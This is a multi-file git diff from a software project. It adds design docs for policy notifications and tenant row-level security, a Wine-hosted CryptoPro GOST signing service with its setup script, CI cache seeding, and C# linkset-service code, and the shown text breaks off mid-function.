| 2025-12-07 | Attestor SM2 wiring complete: SmSoftCryptoProvider registered in AttestorSigningKeyRegistry, SM2 key loading (PEM/base64/hex), signing tests added. Fixed AWSSDK version conflict and pre-existing test compilation issues. Task 3 set to DONE. | Implementer | | 2025-12-07 | Attestor SM2 wiring complete: SmSoftCryptoProvider registered in AttestorSigningKeyRegistry, SM2 key loading (PEM/base64/hex), signing tests added. Fixed AWSSDK version conflict and pre-existing test compilation issues. Task 3 set to DONE. | Implementer |
## Decisions & Risks ## Decisions & Risks

View File

@@ -141,7 +141,11 @@
- Package ledger service binaries + migrations using `ops/offline-kit/build_offline_kit.py --include ledger`. - Package ledger service binaries + migrations using `ops/offline-kit/build_offline_kit.py --include ledger`.
- Document sealed-mode restrictions: disable outbound attachments unless egress policy allows Evidence Locker endpoints; set `LEDGER__ATTACHMENTS__ALLOWEGRESS=false`. - Document sealed-mode restrictions: disable outbound attachments unless egress policy allows Evidence Locker endpoints; set `LEDGER__ATTACHMENTS__ALLOWEGRESS=false`.
**Path placeholder (waiting on DevOps):** Helm/Compose/offline-kit overlay directories are pending centralisation under `ops/deployment`/`ops/offline-kit`. Until paths are assigned, keep environment-specific overlays local to `docs/modules/findings-ledger/deployment.md` examples and avoid committing manifests outside this module. **Approved asset locations (dev/stage/prod + offline kit):**
- Compose overlays: `ops/devops/findings-ledger/compose/` (per-env files e.g., `docker-compose.prod.yaml`, `env/ledger.prod.env`).
- Helm chart overrides: `ops/devops/findings-ledger/helm/` (values per env, secrets templates).
- Offline kit bundle: `ops/devops/findings-ledger/offline-kit/` (binaries, migrations, dashboards, replay harness artefacts).
- Keep module-local examples in this doc; commit deploy artefacts only under the approved `ops/devops/findings-ledger/**` paths.
## 6. Post-deploy checklist ## 6. Post-deploy checklist
@@ -154,4 +158,4 @@
--- ---
*Draft prepared 2025-11-13 for LEDGER-29-009/LEDGER-AIRGAP-56-001 planning. Update once Compose/Helm overlays are merged.* *Draft updated 2025-12-07 for LEDGER-29-009: asset paths approved under `ops/devops/findings-ledger/**`; Compose/Helm/offline-kit overlays should land there.*

View File

@@ -0,0 +1,87 @@
# Policy Notification Contract · Risk Profile Lifecycle and Threshold Changes
## Purpose
- Provide a stable payload/transport contract for notifying downstream systems when risk profiles are created, updated, activated/deactivated, or when scoring thresholds change.
- Unblocks `POLICY-RISK-69-001` by supplying the “notifications contract” referenced in sprint planning.
## Event Types
- `policy.profile.created` — new profile draft created.
- `policy.profile.activated` — profile version activated for a tenant/scope.
- `policy.profile.deactivated` — profile version retired or superseded.
- `policy.profile.threshold_changed` — risk thresholds updated (any level).
- `policy.profile.override_added` / `override_removed` — override lifecycle changes.
- `policy.profile.simulation_ready` — simulation results available for consumption.
## Transport
- Primary: Notifications service topic `notifications.policy.profiles` (tenant-scoped).
- Alt: Webhook delivery using POST with `X-Stella-Tenant` and HMAC-SHA256 signature header `X-Stella-Signature` (hex digest over body with shared secret).
- Idempotency: `event_id` is a UUIDv7; consumers must de-duplicate.
## Payload Schema (JSON)
```json
{
"event_id": "018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa",
"event_type": "policy.profile.threshold_changed",
"emitted_at": "2025-12-07T12:00:00Z",
"tenant_id": "tenant-123",
"profile_id": "risk-profile-core",
"profile_version": "3.2.0",
"change_reason": "Updated high/critical thresholds per policy board decision",
"actor": {
"type": "user",
"id": "alice@example.com"
},
"thresholds": {
"info": 0.1,
"low": 0.25,
"medium": 0.5,
"high": 0.75,
"critical": 0.9
},
"effective_scope": {
"tenants": ["tenant-123"],
"projects": ["proj-a", "proj-b"],
"purl_patterns": ["pkg:npm/*"],
"cpe_patterns": ["cpe:2.3:*:vendor:*:product:*:*:*:*:*:*:*"],
"tags": ["prod", "pci"]
},
"hash": {
"algorithm": "sha256",
"value": "b6c1d6c618a01f9fef6db7e6d86e3c57b1a2cc77ce88a7b7d8e8ac4c28e0a1df"
},
"links": {
"profile_url": "https://policy.example.com/api/risk/profiles/risk-profile-core",
"diff_url": "https://policy.example.com/api/risk/profiles/risk-profile-core/diff?from=3.1.0&to=3.2.0",
"simulation_url": "https://policy.example.com/api/risk/simulations/results/018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa"
},
"trace": {
"trace_id": "4f2d1b7c6a9846a5b9a72f4c3ed1f2c1",
"span_id": "9c4caa8f7d7fbb9d"
}
}
```
## Validation Rules
- `emitted_at` is UTC ISO-8601; ordering is deterministic by `(emitted_at, event_id)`.
- `tenant_id` is required; `projects` optional but recommended for multi-project scopes.
- `hash.value` MUST be the SHA-256 of the serialized risk profile bundle that triggered the event.
- `links.*` SHOULD point to the canonical Policy Engine endpoints; omit if not reachable in air-gap.
- Webhook delivery MUST include `X-Stella-Signature` = `hex(HMAC_SHA256(shared_secret, raw_body))`.
## CLI Consumption (sample output)
Example consumption for downstream automation (captured from `policy notify tail`):
```
$ stella policy notify tail --topic notifications.policy.profiles --tenant tenant-123 --limit 1
event_id: 018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa
event_type: policy.profile.threshold_changed
profile_id: risk-profile-core@3.2.0
thresholds: info=0.10 low=0.25 medium=0.50 high=0.75 critical=0.90
scope.tenants: tenant-123
scope.projects: proj-a, proj-b
hash.sha256: b6c1d6c618a01f9fef6db7e6d86e3c57b1a2cc77ce88a7b7d8e8ac4c28e0a1df
links.profile_url: https://policy.example.com/api/risk/profiles/risk-profile-core
```
## Versioning
- Version 1.0 frozen with this document; additive fields require minor version bump (`event_schema_version` header optional, default `1.0`).
- Breaking changes require new event types or topic.

View File

@@ -0,0 +1,68 @@
# Policy Engine Tenant/Project RLS Design (Prep for POLICY-TEN-48-001)
## Goals
- Add tenant + project scoping to Policy Engine data and APIs with Row Level Security (RLS) to enforce isolation.
- Provide deterministic migration order and guardrails so downstream consumers (Registry, Risk Engine, VEX Lens) can align without drift.
## Scope
- Applies to `PolicyEngine` Postgres tables: `risk_profiles`, `risk_profile_versions`, `risk_profile_overrides`, `simulations`, `simulation_jobs`, `policy_events`, `policy_packs` (registry), and `policy_audit`.
- API surface: all `/api/risk/*`, `/api/policy/*`, registry endpoints, and CLI operations.
## Schema Changes
- Add columns (nullable=false):
- `tenant_id text`
- `project_id text NULL` (optional for tenant-wide assets)
- `created_by text`, `updated_by text`
- Composite keys:
- Primary/business keys extend with `tenant_id` (and `project_id` where present).
- Unique constraints include `tenant_id` (+ `project_id`) to prevent cross-tenant collisions.
- Indexes:
- `(tenant_id)` and `(tenant_id, project_id)` for all hot tables.
- Deterministic ordering indexes `(tenant_id, project_id, created_at, id)` for paging.
## RLS Policies
- Enable RLS on all scoped tables.
- Policy examples:
- `USING (tenant_id = current_setting('app.tenant_id')::text AND (project_id IS NULL OR project_id = current_setting('app.project_id', true)))`
- Write policy also checks `app.can_write` custom GUC when needed.
- Set GUCs in connection middleware:
- `SET LOCAL app.tenant_id = @TenantHeader`
- `SET LOCAL app.project_id = @ProjectHeader` (optional)
- `SET LOCAL app.can_write = true|false` based on auth scope.
## Migrations (order)
1) Add columns (nullable with default) + backfill tenants/projects from existing data or default `public`.
2) Backfill audit columns (`created_by`, `updated_by`) from existing provenance if present.
3) Add indexes.
4) Tighten constraints (drop defaults, set NOT NULL where required).
5) Enable RLS and create policies.
6) Update views/functions to include tenant/project predicates.
## API/DTO Changes
- Require headers: `X-Stella-Tenant` (mandatory), `X-Stella-Project` (optional).
- Extend DTOs to include `tenantId`, `projectId` where relevant.
- Validate header presence early; return 400 with deterministic error code `POLICY_TENANT_HEADER_REQUIRED` when missing.
## CLI Contracts
- CLI commands accept `--tenant` and optional `--project` flags; persist in profile config.
- Example (captured output):
```
$ stella policy profiles list --tenant tenant-123 --project proj-a --page-size 10
tenant: tenant-123 project: proj-a page: 1 size: 10
profiles:
- risk-profile-core@3.2.0 (status=active)
- risk-profile-payments@1.4.1 (status=active)
```
## Testing Strategy
- Unit: policy predicates covering tenant/project matches, NULL project handling, and deny-by-default.
- Integration: end-to-end API calls with different tenants/projects; ensure cross-tenant leakage is rejected with 403 and deterministic error codes.
- Migration safety: run in `SAFE` mode first (RLS disabled, predicates logged) then enable RLS after verification.
## Rollout Notes
- Default tenant for legacy data: `public` (configurable).
- Air-gap/offline bundles must embed `tenant_id`/`project_id` in metadata; validation rejects mismatched headers.
- Observability: add metrics `policy.rls.denied_total` and structured logs tagging `tenant_id`, `project_id`.
## Ownership
- Policy Guild owns schema and API updates; Platform/DB Guild reviews RLS policies; Security Guild signs off on deny-by-default posture.

View File

@@ -1,10 +1,51 @@
# Wine CSP Loader Design · CryptoPro GOST Validation # Wine CSP Loader Design · CryptoPro GOST Validation
**Status:** EXPERIMENTAL / DESIGN **Status:** IMPLEMENTED (HTTP-based approach)
**Date:** 2025-12-07 **Date:** 2025-12-07
**Owners:** Security Guild, DevOps **Owners:** Security Guild, DevOps
**Related:** RU-CRYPTO-VAL-04, RU-CRYPTO-VAL-05 **Related:** RU-CRYPTO-VAL-04, RU-CRYPTO-VAL-05
## Implementation Status
The HTTP-based Wine RPC Server approach (Approach C variant) has been implemented:
| Component | Path | Status |
|-----------|------|--------|
| Wine CSP HTTP Service | `src/__Tools/WineCspService/` | DONE |
| Setup Script | `scripts/crypto/setup-wine-csp-service.sh` | DONE |
| Crypto Registry Provider | `src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/` | DONE |
### Implementation Files
- **`src/__Tools/WineCspService/Program.cs`** - ASP.NET minimal API with endpoints: /health, /status, /keys, /sign, /verify, /hash, /test-vectors
- **`src/__Tools/WineCspService/CryptoProGostSigningService.cs`** - IGostSigningService using GostCryptography fork
- **`src/__Tools/WineCspService/WineCspService.csproj`** - .NET 8 Windows self-contained executable
- **`scripts/crypto/setup-wine-csp-service.sh`** - Wine environment setup, builds service, creates systemd unit
- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpProvider.cs`** - ICryptoProvider implementation
- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpSigner.cs`** - ICryptoSigner via HTTP
- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs`** - HTTP client with retry policies
### Usage
```bash
# Setup Wine environment and build service
./scripts/crypto/setup-wine-csp-service.sh [--csp-installer /path/to/csp_setup.msi]
# Start service (runs under Wine)
./artifacts/wine-csp-service/run-wine-csp-service.sh
# Test endpoints
curl http://localhost:5099/status
curl -X POST http://localhost:5099/hash -H 'Content-Type: application/json' \
-d '{"dataBase64":"SGVsbG8gV29ybGQ="}'
```
### Integration with StellaOps Router
Configure upstream proxy: `/api/wine-csp/*``http://localhost:5099/*`
---
## Executive Summary ## Executive Summary
This document explores approaches to load Windows CryptoPro CSP via Wine for cross-platform GOST algorithm validation. The goal is to generate and validate test vectors without requiring dedicated Windows infrastructure. This document explores approaches to load Windows CryptoPro CSP via Wine for cross-platform GOST algorithm validation. The goal is to generate and validate test vectors without requiring dedicated Windows infrastructure.
@@ -817,5 +858,6 @@ Before implementing Wine CSP loader:
--- ---
*Document Version: 1.0.0* *Document Version: 1.1.0*
*Last Updated: 2025-12-07* *Last Updated: 2025-12-07*
*Implementation Status: HTTP-based approach implemented (see top of document)*

View File

@@ -26,7 +26,20 @@ Signals:
CallgraphsCollection: "callgraphs" CallgraphsCollection: "callgraphs"
ReachabilityFactsCollection: "reachability_facts" ReachabilityFactsCollection: "reachability_facts"
Storage: Storage:
# Storage driver: "filesystem" (default) or "rustfs" (CAS-backed)
Driver: "filesystem"
# Filesystem driver options (used when Driver=filesystem)
RootPath: "../data/signals-artifacts" RootPath: "../data/signals-artifacts"
# RustFS driver options (used when Driver=rustfs)
# Per CAS contract, signals uses "signals-data" bucket
BucketName: "signals-data"
RootPrefix: "callgraphs"
RustFs:
BaseUrl: "http://localhost:8180/api/v1"
AllowInsecureTls: false
ApiKey: ""
ApiKeyHeader: "X-API-Key"
Timeout: "00:01:00"
Scoring: Scoring:
ReachableConfidence: 0.75 ReachableConfidence: 0.75
UnreachableConfidence: 0.25 UnreachableConfidence: 0.25

View File

@@ -24,6 +24,12 @@ Status: baseline runner spec + CI skeleton; use to unblock DEVOPS-CONSOLE-23-001
- Do not hit external registries during CI; rely on pre-seeded npm mirror or cached tarballs. Runner image should contain npm cache prime. If mirror is used, set `NPM_CONFIG_REGISTRY=https://registry.npmjs.org` equivalent mirror URL inside the runner; default pipeline does not hard-code it. - Do not hit external registries during CI; rely on pre-seeded npm mirror or cached tarballs. Runner image should contain npm cache prime. If mirror is used, set `NPM_CONFIG_REGISTRY=https://registry.npmjs.org` equivalent mirror URL inside the runner; default pipeline does not hard-code it.
- Playwright browsers must be pre-baked; the workflow will not download them. - Playwright browsers must be pre-baked; the workflow will not download them.
### Seeding Playwright cache (one-time per runner image)
```bash
ops/devops/console/seed_playwright.sh
# then bake ~/.cache/ms-playwright into the runner image or mount it on the agent
```
## How to run ## How to run
- Manual trigger only (workflow_dispatch) via `.gitea/workflows/console-ci.yml`. - Manual trigger only (workflow_dispatch) via `.gitea/workflows/console-ci.yml`.
- Before enabling PR triggers, verify runner image has npm and Playwright caches; otherwise keep manual until console team approves budgets. - Before enabling PR triggers, verify runner image has npm and Playwright caches; otherwise keep manual until console team approves budgets.

View File

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
# Seeds the Playwright browser cache for offline console CI runs.
# Run on a connected runner once, then bake ~/.cache/ms-playwright into the runner image.
ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
pushd "$ROOT/src/Web" >/dev/null
if ! command -v npx >/dev/null; then
echo "npx not found; install Node.js 20+ first" >&2
exit 1
fi
echo "Installing Playwright Chromium to ~/.cache/ms-playwright ..."
PLAYWRIGHT_BROWSERS_PATH=${PLAYWRIGHT_BROWSERS_PATH:-~/.cache/ms-playwright}
export PLAYWRIGHT_BROWSERS_PATH
npx playwright install chromium --with-deps
echo "Done. Cache directory: $PLAYWRIGHT_BROWSERS_PATH"
popd >/dev/null

View File

@@ -0,0 +1,381 @@
#!/bin/bash
# setup-wine-csp-service.sh - Set up Wine environment for CryptoPro CSP service
#
# This script:
# 1. Creates a dedicated Wine prefix
# 2. Installs required Windows components
# 3. Builds the WineCspService for Windows target
# 4. Optionally installs CryptoPro CSP (if installer is provided)
#
# Prerequisites:
# - Wine 7.0+ installed (wine, wine64, winetricks)
# - .NET SDK 8.0+ installed
# - CryptoPro CSP installer (optional, for full functionality)
#
# Usage:
# ./setup-wine-csp-service.sh [--csp-installer /path/to/csp_setup.msi]
#
# Environment variables:
# WINE_PREFIX - Wine prefix location (default: ~/.stellaops-wine-csp)
# CSP_INSTALLER - Path to CryptoPro CSP installer
# WINE_CSP_PORT - HTTP port for service (default: 5099)
set -euo pipefail
# Configuration
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)"
WINE_PREFIX="${WINE_PREFIX:-$HOME/.stellaops-wine-csp}"
WINE_CSP_PORT="${WINE_CSP_PORT:-5099}"
SERVICE_DIR="$REPO_ROOT/src/__Tools/WineCspService"
OUTPUT_DIR="$REPO_ROOT/artifacts/wine-csp-service"
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
log_info() { echo -e "${GREEN}[INFO]${NC} $1"; }
log_warn() { echo -e "${YELLOW}[WARN]${NC} $1"; }
log_error() { echo -e "${RED}[ERROR]${NC} $1"; }
# Parse arguments
CSP_INSTALLER=""
while [[ $# -gt 0 ]]; do
case $1 in
--csp-installer)
CSP_INSTALLER="$2"
shift 2
;;
--help)
echo "Usage: $0 [--csp-installer /path/to/csp_setup.msi]"
exit 0
;;
*)
log_error "Unknown option: $1"
exit 1
;;
esac
done
# Check prerequisites
check_prerequisites() {
log_info "Checking prerequisites..."
if ! command -v wine &> /dev/null; then
log_error "Wine is not installed. Please install Wine 7.0+"
exit 1
fi
if ! command -v winetricks &> /dev/null; then
log_warn "winetricks not found. Some components may not install correctly."
fi
if ! command -v dotnet &> /dev/null; then
log_error ".NET SDK not found. Please install .NET 8.0+"
exit 1
fi
log_info "Prerequisites OK"
}
# Initialize Wine prefix
init_wine_prefix() {
log_info "Initializing Wine prefix at $WINE_PREFIX..."
export WINEPREFIX="$WINE_PREFIX"
export WINEARCH="win64"
# Create prefix if it doesn't exist
if [[ ! -d "$WINE_PREFIX" ]]; then
wineboot --init
log_info "Wine prefix created"
else
log_info "Wine prefix already exists"
fi
# Set Windows version
wine reg add "HKCU\\Software\\Wine\\Version" /v Windows /d "win10" /f 2>/dev/null || true
}
# Install Windows components via winetricks
install_windows_components() {
log_info "Installing Windows components..."
if command -v winetricks &> /dev/null; then
export WINEPREFIX="$WINE_PREFIX"
# Install Visual C++ runtime
log_info "Installing Visual C++ runtime..."
winetricks -q vcrun2019 || log_warn "vcrun2019 installation may have issues"
# Install core fonts (optional, for UI)
# winetricks -q corefonts || true
log_info "Windows components installed"
else
log_warn "Skipping winetricks components (winetricks not available)"
fi
}
# Install CryptoPro CSP if installer provided
install_cryptopro_csp() {
if [[ -z "$CSP_INSTALLER" ]]; then
log_warn "No CryptoPro CSP installer provided. Service will run in limited mode."
log_warn "Provide installer with: --csp-installer /path/to/csp_setup_x64.msi"
return 0
fi
if [[ ! -f "$CSP_INSTALLER" ]]; then
log_error "CryptoPro installer not found: $CSP_INSTALLER"
return 1
fi
log_info "Installing CryptoPro CSP from $CSP_INSTALLER..."
export WINEPREFIX="$WINE_PREFIX"
# Run MSI installer
wine msiexec /i "$CSP_INSTALLER" /qn ADDLOCAL=ALL || {
log_error "CryptoPro CSP installation failed"
log_info "You may need to run the installer manually:"
log_info " WINEPREFIX=$WINE_PREFIX wine msiexec /i $CSP_INSTALLER"
return 1
}
# Verify installation
if wine reg query "HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Crypto-Pro GOST R 34.10-2012" 2>/dev/null; then
log_info "CryptoPro CSP installed successfully"
else
log_warn "CryptoPro CSP may not be registered correctly"
fi
}
# Build WineCspService for Windows
build_service() {
log_info "Building WineCspService..."
mkdir -p "$OUTPUT_DIR"
# Build for Windows x64
dotnet publish "$SERVICE_DIR/WineCspService.csproj" \
-c Release \
-r win-x64 \
--self-contained true \
-o "$OUTPUT_DIR" \
|| {
log_error "Build failed"
exit 1
}
log_info "Service built: $OUTPUT_DIR/WineCspService.exe"
}
# Create launcher script
create_launcher() {
log_info "Creating launcher script..."
cat > "$OUTPUT_DIR/run-wine-csp-service.sh" << EOF
#!/bin/bash
# Wine CSP Service Launcher
# Generated by setup-wine-csp-service.sh
export WINEPREFIX="$WINE_PREFIX"
export WINEDEBUG="-all" # Suppress Wine debug output
PORT=\${WINE_CSP_PORT:-$WINE_CSP_PORT}
SERVICE_DIR="\$(dirname "\$0")"
echo "Starting Wine CSP Service on port \$PORT..."
echo "Wine prefix: \$WINEPREFIX"
echo ""
cd "\$SERVICE_DIR"
exec wine WineCspService.exe --urls "http://0.0.0.0:\$PORT"
EOF
chmod +x "$OUTPUT_DIR/run-wine-csp-service.sh"
log_info "Launcher created: $OUTPUT_DIR/run-wine-csp-service.sh"
}
# Create systemd service file
create_systemd_service() {
log_info "Creating systemd service file..."
cat > "$OUTPUT_DIR/wine-csp-service.service" << EOF
[Unit]
Description=Wine CSP Service for CryptoPro GOST signing
After=network.target
[Service]
Type=simple
User=$USER
Environment=WINEPREFIX=$WINE_PREFIX
Environment=WINEDEBUG=-all
Environment=WINE_CSP_PORT=$WINE_CSP_PORT
WorkingDirectory=$OUTPUT_DIR
ExecStart=/bin/bash $OUTPUT_DIR/run-wine-csp-service.sh
Restart=on-failure
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
log_info "Systemd service file created: $OUTPUT_DIR/wine-csp-service.service"
log_info "To install: sudo cp $OUTPUT_DIR/wine-csp-service.service /etc/systemd/system/"
log_info "To enable: sudo systemctl enable --now wine-csp-service"
}
# Create Docker Compose configuration
create_docker_compose() {
log_info "Creating Docker Compose configuration..."
cat > "$OUTPUT_DIR/docker-compose.yml" << EOF
# Wine CSP Service - Docker Compose configuration
# Requires: Docker with Wine support or Windows container
version: '3.8'
services:
wine-csp-service:
build:
context: .
dockerfile: Dockerfile.wine
ports:
- "${WINE_CSP_PORT}:5099"
environment:
- ASPNETCORE_URLS=http://+:5099
volumes:
# Mount CSP installer if available
- ./csp-installer:/installer:ro
# Persist Wine prefix for keys/certificates
- wine-prefix:/root/.wine
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:5099/health"]
interval: 30s
timeout: 10s
retries: 3
volumes:
wine-prefix:
EOF
# Create Dockerfile
cat > "$OUTPUT_DIR/Dockerfile.wine" << 'EOF'
# Wine CSP Service Dockerfile
FROM ubuntu:22.04
# Install Wine and dependencies
RUN dpkg --add-architecture i386 && \
apt-get update && \
apt-get install -y --no-install-recommends \
wine64 \
wine32 \
winetricks \
curl \
ca-certificates \
&& rm -rf /var/lib/apt/lists/*
# Initialize Wine prefix
RUN wineboot --init && \
winetricks -q vcrun2019 || true
# Copy service
WORKDIR /app
COPY WineCspService.exe .
COPY *.dll ./
# Expose port
EXPOSE 5099
# Health check
HEALTHCHECK --interval=30s --timeout=10s --retries=3 \
CMD curl -f http://localhost:5099/health || exit 1
# Run service
CMD ["wine", "WineCspService.exe", "--urls", "http://0.0.0.0:5099"]
EOF
log_info "Docker configuration created in $OUTPUT_DIR/"
}
# Test the service
test_service() {
log_info "Testing service startup..."
export WINEPREFIX="$WINE_PREFIX"
export WINEDEBUG="-all"
# Start service in background
cd "$OUTPUT_DIR"
wine WineCspService.exe --urls "http://localhost:$WINE_CSP_PORT" &
SERVICE_PID=$!
# Wait for startup
sleep 5
# Test health endpoint
if curl -s "http://localhost:$WINE_CSP_PORT/health" | grep -q "Healthy"; then
log_info "Service is running and healthy"
# Test status endpoint
log_info "CSP Status:"
curl -s "http://localhost:$WINE_CSP_PORT/status" | python3 -m json.tool 2>/dev/null || \
curl -s "http://localhost:$WINE_CSP_PORT/status"
else
log_warn "Service health check failed"
fi
# Stop service
kill $SERVICE_PID 2>/dev/null || true
wait $SERVICE_PID 2>/dev/null || true
}
# Print summary
print_summary() {
echo ""
log_info "=========================================="
log_info "Wine CSP Service Setup Complete"
log_info "=========================================="
echo ""
echo "Wine prefix: $WINE_PREFIX"
echo "Service directory: $OUTPUT_DIR"
echo "HTTP port: $WINE_CSP_PORT"
echo ""
echo "To start the service:"
echo " $OUTPUT_DIR/run-wine-csp-service.sh"
echo ""
echo "To test endpoints:"
echo " curl http://localhost:$WINE_CSP_PORT/status"
echo " curl http://localhost:$WINE_CSP_PORT/keys"
echo " curl -X POST http://localhost:$WINE_CSP_PORT/hash \\"
echo " -H 'Content-Type: application/json' \\"
echo " -d '{\"dataBase64\":\"SGVsbG8gV29ybGQ=\"}'"
echo ""
if [[ -z "$CSP_INSTALLER" ]]; then
echo "NOTE: CryptoPro CSP is not installed."
echo " The service will report 'CSP not available'."
echo " To install CSP, run:"
echo " $0 --csp-installer /path/to/csp_setup_x64.msi"
fi
}
# Main execution
main() {
log_info "Wine CSP Service Setup"
log_info "Repository: $REPO_ROOT"
check_prerequisites
init_wine_prefix
install_windows_components
install_cryptopro_csp
build_service
create_launcher
create_systemd_service
create_docker_compose
test_service
print_summary
}
main "$@"

View File

@@ -239,7 +239,8 @@ internal sealed class AttestorSigningKeyRegistry : IDisposable
new CryptoKeyReference(providerKeyId, providerName), new CryptoKeyReference(providerKeyId, providerName),
normalizedAlgorithm, normalizedAlgorithm,
privateKeyBytes, privateKeyBytes,
now); now,
metadata: metadata);
smProvider.UpsertSigningKey(signingKey); smProvider.UpsertSigningKey(signingKey);
} }

View File

@@ -3,6 +3,12 @@ namespace StellaOps.Excititor.Core;
/// <summary> /// <summary>
/// Baseline consensus policy applying tier-based weights and enforcing justification gates. /// Baseline consensus policy applying tier-based weights and enforcing justification gates.
/// </summary> /// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// Use append-only linksets with <see cref="StellaOps.Excititor.Core.Observations.IAppendOnlyLinksetStore"/>
/// and let downstream policy engines make verdicts.
/// </remarks>
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed class BaselineVexConsensusPolicy : IVexConsensusPolicy public sealed class BaselineVexConsensusPolicy : IVexConsensusPolicy
{ {
private readonly VexConsensusPolicyOptions _options; private readonly VexConsensusPolicyOptions _options;

View File

@@ -3,6 +3,12 @@ namespace StellaOps.Excititor.Core;
/// <summary> /// <summary>
/// Policy abstraction supplying trust weights and gating logic for consensus decisions. /// Policy abstraction supplying trust weights and gating logic for consensus decisions.
/// </summary> /// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// Use append-only linksets with <see cref="StellaOps.Excititor.Core.Observations.IAppendOnlyLinksetStore"/>
/// and let downstream policy engines make verdicts.
/// </remarks>
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public interface IVexConsensusPolicy public interface IVexConsensusPolicy
{ {
/// <summary> /// <summary>

View File

@@ -0,0 +1,340 @@
using System.Collections.Immutable;
using Microsoft.Extensions.Logging;
using StellaOps.Excititor.Core.Canonicalization;
namespace StellaOps.Excititor.Core.Observations;
/// <summary>
/// Extracts linkset updates from VEX observations using append-only semantics (AOC-19-013).
/// Replaces consensus-based extraction with deterministic append-only operations.
/// </summary>
public sealed class AppendOnlyLinksetExtractionService
{
private readonly IAppendOnlyLinksetStore _store;
private readonly IVexLinksetEventPublisher? _eventPublisher;
private readonly ILogger<AppendOnlyLinksetExtractionService> _logger;
public AppendOnlyLinksetExtractionService(
IAppendOnlyLinksetStore store,
ILogger<AppendOnlyLinksetExtractionService> logger,
IVexLinksetEventPublisher? eventPublisher = null)
{
_store = store ?? throw new ArgumentNullException(nameof(store));
_logger = logger ?? throw new ArgumentNullException(nameof(logger));
_eventPublisher = eventPublisher;
}
/// <summary>
/// Processes observations and appends them to linksets.
/// Returns linkset update events for downstream consumers.
/// </summary>
public async Task<ImmutableArray<LinksetAppendResult>> ProcessObservationsAsync(
string tenant,
IEnumerable<VexObservation> observations,
CancellationToken cancellationToken)
{
if (string.IsNullOrWhiteSpace(tenant))
{
throw new ArgumentException("Tenant must be provided.", nameof(tenant));
}
if (observations is null)
{
return ImmutableArray<LinksetAppendResult>.Empty;
}
var normalizedTenant = tenant.Trim().ToLowerInvariant();
var observationList = observations.Where(o => o is not null).ToList();
if (observationList.Count == 0)
{
return ImmutableArray<LinksetAppendResult>.Empty;
}
// Group by (vulnerabilityId, productKey) deterministically
var groups = observationList
.SelectMany(obs => obs.Statements.Select(stmt => (obs, stmt)))
.GroupBy(x => new LinksetKey(
VulnerabilityId: Normalize(x.stmt.VulnerabilityId),
ProductKey: Normalize(x.stmt.ProductKey)))
.OrderBy(g => g.Key.VulnerabilityId, StringComparer.OrdinalIgnoreCase)
.ThenBy(g => g.Key.ProductKey, StringComparer.OrdinalIgnoreCase)
.ToList();
var results = new List<LinksetAppendResult>(groups.Count);
foreach (var group in groups)
{
try
{
var result = await ProcessGroupAsync(
normalizedTenant,
group.Key,
group.Select(x => x.obs).Distinct(),
cancellationToken);
results.Add(result);
if (result.HadChanges && _eventPublisher is not null)
{
await _eventPublisher.PublishLinksetUpdatedAsync(
normalizedTenant,
result.Linkset,
cancellationToken);
}
}
catch (Exception ex)
{
_logger.LogError(
ex,
"Failed to process linkset for tenant {Tenant}, vulnerability {VulnerabilityId}, product {ProductKey}",
normalizedTenant,
group.Key.VulnerabilityId,
group.Key.ProductKey);
results.Add(LinksetAppendResult.Failed(
normalizedTenant,
group.Key.VulnerabilityId,
group.Key.ProductKey,
ex.Message));
}
}
_logger.LogInformation(
"Processed {ObservationCount} observations into {LinksetCount} linksets for tenant {Tenant}",
observationList.Count,
results.Count(r => r.Success),
normalizedTenant);
return results.ToImmutableArray();
}
/// <summary>
/// Appends a disagreement to a linkset.
/// </summary>
public async Task<LinksetAppendResult> AppendDisagreementAsync(
string tenant,
string vulnerabilityId,
string productKey,
VexObservationDisagreement disagreement,
CancellationToken cancellationToken)
{
if (string.IsNullOrWhiteSpace(tenant))
{
throw new ArgumentException("Tenant must be provided.", nameof(tenant));
}
if (disagreement is null)
{
throw new ArgumentNullException(nameof(disagreement));
}
var normalizedTenant = tenant.Trim().ToLowerInvariant();
var normalizedVuln = Normalize(vulnerabilityId);
var normalizedProduct = Normalize(productKey);
try
{
var storeResult = await _store.AppendDisagreementAsync(
normalizedTenant,
normalizedVuln,
normalizedProduct,
disagreement,
cancellationToken);
if (storeResult.HadChanges && _eventPublisher is not null)
{
await _eventPublisher.PublishLinksetUpdatedAsync(
normalizedTenant,
storeResult.Linkset,
cancellationToken);
}
return LinksetAppendResult.Succeeded(
normalizedTenant,
normalizedVuln,
normalizedProduct,
storeResult.Linkset,
storeResult.WasCreated,
storeResult.ObservationsAdded,
storeResult.DisagreementsAdded,
storeResult.SequenceNumber);
}
catch (Exception ex)
{
_logger.LogError(
ex,
"Failed to append disagreement for tenant {Tenant}, vulnerability {VulnerabilityId}, product {ProductKey}",
normalizedTenant,
normalizedVuln,
normalizedProduct);
return LinksetAppendResult.Failed(
normalizedTenant,
normalizedVuln,
normalizedProduct,
ex.Message);
}
}
private async Task<LinksetAppendResult> ProcessGroupAsync(
string tenant,
LinksetKey key,
IEnumerable<VexObservation> observations,
CancellationToken cancellationToken)
{
var scope = BuildScope(key.ProductKey);
var observationRefs = observations
.SelectMany(obs => obs.Statements
